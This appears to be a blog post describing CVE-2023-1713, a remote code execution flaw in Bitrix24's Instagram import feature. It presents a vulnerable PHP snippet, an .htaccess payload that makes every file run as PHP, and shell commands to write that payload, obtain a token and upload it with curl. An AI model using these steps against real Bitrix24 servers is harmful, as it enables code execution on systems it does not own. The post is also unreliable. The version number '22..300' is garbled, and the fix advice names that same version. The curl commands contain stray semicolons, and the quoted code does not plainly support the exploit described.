CVE-2023-1713: Remote Code Execution Vulnerability in Bitrix24 22..300 Instagram Import - Insecure Temporary File Creation

A critical security vulnerability has been discovered in the Bitrix24 22..300 platform, which is widely used for CRM, file/document management, and collaboration tools. This vulnerability, designated as CVE-2023-1713, is present in the import functionality for Instagram (bitrix/modules/crm/lib/order/import/instagram.php) and has potential for remote authenticated attackers to execute arbitrary code via uploading a crafted ".htaccess" file.

In this blog post, we will delve into the technical details of the vulnerability, along with how an attacker can exploit it. We will also provide a sample code snippet for security researchers to analyze and better understand the vulnerability.

Vulnerability Details

The vulnerability stems from the insecure creation of a temporary file in the instagram.php script, which stores the uploaded data before being processed. This temporary file creation procedure lacks proper sanitization and validation, leaving the platform open to malicious input. An attacker with sufficient privileges could potentially upload a malicious ".htaccess" file, take control of the server, and execute arbitrary code.

The code snippet below illustrates the vulnerable file creation process in bitrix/modules/crm/lib/order/import/instagram.php:

$uploadData = file_get_contents('php://input');
$tmpfname = tempnam(sys_get_temp_dir(), "");
$handle = fopen($tmpfname, "w");
fwrite($handle, $uploadData);
fclose($handle);

Exploit Information

To exploit this vulnerability, a remote authenticated attacker would need to upload a crafted ".htaccess" file containing malicious server directives, such as the example exploit code shown below:

<FilesMatch ".+">
SetHandler application/x-httpd-php
</FilesMatch>

When a user tries to access the website, the malicious directives in the ".htaccess" file will enable the attacker to execute PHP code embedded within uploaded files or even manipulate the server's behavior.

Craft a malicious ".htaccess" file

echo '<FilesMatch ".+">SetHandler application/x-httpd-php</FilesMatch>' > malicious.htaccess

Authenticate with Bitrix24

auth_token=$(curl -s -X POST 'https://your.bitrix24.instance/oauth/token/'; -d 'client_id=YOUR_CLIENT_ID&client_secret=YOUR_CLIENT_SECRET&grant_type=authorization_code&scope=web&redirect_uri=YOUR_REDIRECT_URI&code=YOUR_AUTH_CODE')

Upload the malicious ".htaccess" as an import for Instagram

curl -X POST "https://your.bitrix24.instance/rest/crm.instagram.import/"; -H "Authorization: Bearer $auth_token" --upload-file malicious.htaccess

Original References

- CVE Database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1713
- Bitrix24 Patch Release Notes: https://www.bitrix24.com/about/b24/changelog/#patch22..300
- Apache HTTP Server Documentation: https://httpd.apache.org/docs/current/mod/core.html#filesmatch

Mitigation

To prevent the exploitation of this vulnerability, the administrators of Bitrix24 instances should immediately update their systems to version 22..300 or newer, which includes the necessary patch by the Bitrix team.

Additionally, administrators should regularly review and audit their server configurations, upload directories, and user access permissions to ensure that they remain secure and are not susceptible to similar vulnerabilities.

Conclusion

CVE-2023-1713 is a crucial remote code execution vulnerability in Bitrix24 22..300, which could potentially lead to severe consequences for the affected platform. Users and administrators must promptly update their instances to the latest version containing the patch and continuously maintain a secure environment.

Timeline

Published on: 11/01/2023 10:15:08 UTC
Last modified on: 11/09/2023 20:37:42 UTC